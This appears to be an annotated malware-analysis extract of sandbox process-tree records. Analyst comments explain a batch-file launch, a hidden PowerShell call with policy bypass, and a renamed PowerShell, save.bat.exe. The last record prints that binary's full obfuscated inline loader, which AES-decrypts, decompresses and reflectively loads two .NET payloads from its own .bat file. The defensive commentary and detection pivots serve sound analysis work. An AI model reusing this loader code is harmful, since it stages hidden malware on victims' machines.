# Sandbox process-tree records: each entry is an image name followed by its command line.
# NOTE(review): the bare numbers ("3040" here) look like PIDs that extraction fused onto the
# start of the next record; which process each one belongs to cannot be confirmed from this extract.
#
# Record 1: cmd.exe runs a batch file from the user's Temp directory through `start /wait`.
# The quoted "LMwqEbeQv" is the window-title argument of `start`, not a program; the
# random-looking title and the script path under AppData\Local\Temp are both usable hunting pivots.
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LMwqEbeQv" C:\Users\test22\AppData\Local\Temp\save.bat
# Record 2: PowerShell is started with no profile, a hidden window and execution policy bypass.
# As recorded, the -c body is only `#`, which PowerShell parses as a comment, so this invocation
# carries no script of its own. NOTE(review): the purpose is not visible here, and the command
# line may have been truncated by the capture; confirm against the raw sandbox log.
3040powershell.exe powershell -noprofile -w hidden -ep bypass -c #
# Process-tree record: save.bat.exe, located in the user's Temp directory, is started with
# PowerShell switches (-noprofile -ep bypass -c <script>).
# NOTE(review): presumably a renamed copy of powershell.exe; confirm via file hash or the
# OriginalFileName version field. The leading "2272" looks like a PID fused onto the image name.
#
# What the inline script does, as far as this command line shows:
#  - yR strips every '@' from a string. It rebuilds .NET member names at run time so they never
#    appear literally in the command line: FromBase64String, Split, ReadAllText, EntryPoint,
#    ChangeExtension, Invoke, GetCurrentProcess, TransformFinalBlock, CreateDecryptor, Load.
#    Plain string matching on those names will miss this; the '@'-split literals themselves and
#    the un-obfuscated type names (System.Security.Cryptography.Aes, GZipStream,
#    System.Reflection.Assembly) remain visible.
#  - nAwju decrypts a byte array with AES in CBC mode and PKCS7 padding; key and IV arrive
#    Base64-encoded.
#  - GmSLK GZip-decompresses a byte array through in-memory streams.
#  - Gvvpt loads a byte array as a .NET assembly and invokes its entry point with the given
#    argument. This script itself writes no decoded payload to disk; what the loaded assemblies
#    do afterwards is not visible here.
#  - Main flow: takes the running process's own image path, drops the final extension
#    (save.bat.exe -> save.bat), reads that file as text, takes its last line, skips the first
#    two characters, and splits the rest on '\' into four fields: [0] and [1] are Base64
#    ciphertexts, [2] the key, [3] the IV. Both blobs are decrypted and decompressed; the
#    assembly from field [1] is invoked first, then the one from field [0].
#
# Analyst notes: ciphertext, key and IV all sit in the last line of the same .bat, so both
# payloads can be recovered statically from the file without running it. Detection pivots in
# this record: an .exe with a double extension running from AppData\Local\Temp, -ep bypass
# combined with a long inline -c body, and an image name that does not match its
# PowerShell-style arguments.
2272save.bat.exe "C:\Users\test22\AppData\Local\Temp\save.bat.exe" -noprofile -ep bypass -c function yR($v){$v.Replace('@', '')}$Kh=yR 'Fro@mBa@se64@St@ri@ng@';$IZ=yR 'Spl@it@';$oS=yR 'R@e@a@dAll@Te@x@t@';$hn=yR 'Entr@yPo@int@';$bU=yR 'Ch@an@g@eEx@ten@s@io@n@';$qi=yR 'I@nv@ok@e@';$qJ=yR 'Get@Cu@r@r@e@ntP@ro@ces@s@';$Xu=yR 'Tra@ns@form@Fi@nal@Bloc@k@';$BY=yR 'C@r@ea@te@D@ecr@ypt@o@r@';$nX=yR 'Loa@d@';function nAwju($EukzE,$KnLgV,$DHvkN){$mNRTM=[System.Security.Cryptography.Aes]::Create();$mNRTM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mNRTM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mNRTM.Key=[System.Convert]::$Kh($KnLgV);$mNRTM.IV=[System.Convert]::$Kh($DHvkN);$XIotA=$mNRTM.$BY();$HuHEw=$XIotA.$Xu($EukzE,0,$EukzE.Length);$XIotA.Dispose();$mNRTM.Dispose();$HuHEw;}function GmSLK($EukzE){$ttBgS=New-Object System.IO.MemoryStream(,$EukzE);$bHGBk=New-Object System.IO.MemoryStream;$IttUw=New-Object System.IO.Compression.GZipStream($ttBgS,[IO.Compression.CompressionMode]::Decompress);$IttUw.CopyTo($bHGBk);$IttUw.Dispose();$ttBgS.Dispose();$bHGBk.Dispose();$bHGBk.ToArray();}function Gvvpt($EukzE,$KnLgV){[System.Reflection.Assembly]::$nX([byte[]]$EukzE).$hn.$qi($null,$KnLgV);}$cBaPI=[System.IO.File]::$oS([System.IO.Path]::$bU([System.Diagnostics.Process]::$qJ().MainModule.FileName, $null)).$IZ([Environment]::NewLine);$erUjZ=$cBaPI[$cBaPI.Length-1].Substring(2);$CYaoK=[string[]]$erUjZ.$IZ('\');$aOqoR=GmSLK (nAwju ([Convert]::$Kh($CYaoK[0])) $CYaoK[2] $CYaoK[3]);$YQHYd=GmSLK (nAwju ([Convert]::$Kh($CYaoK[1])) $CYaoK[2] $CYaoK[3]);Gvvpt $YQHYd $null;Gvvpt $aOqoR $null;
2396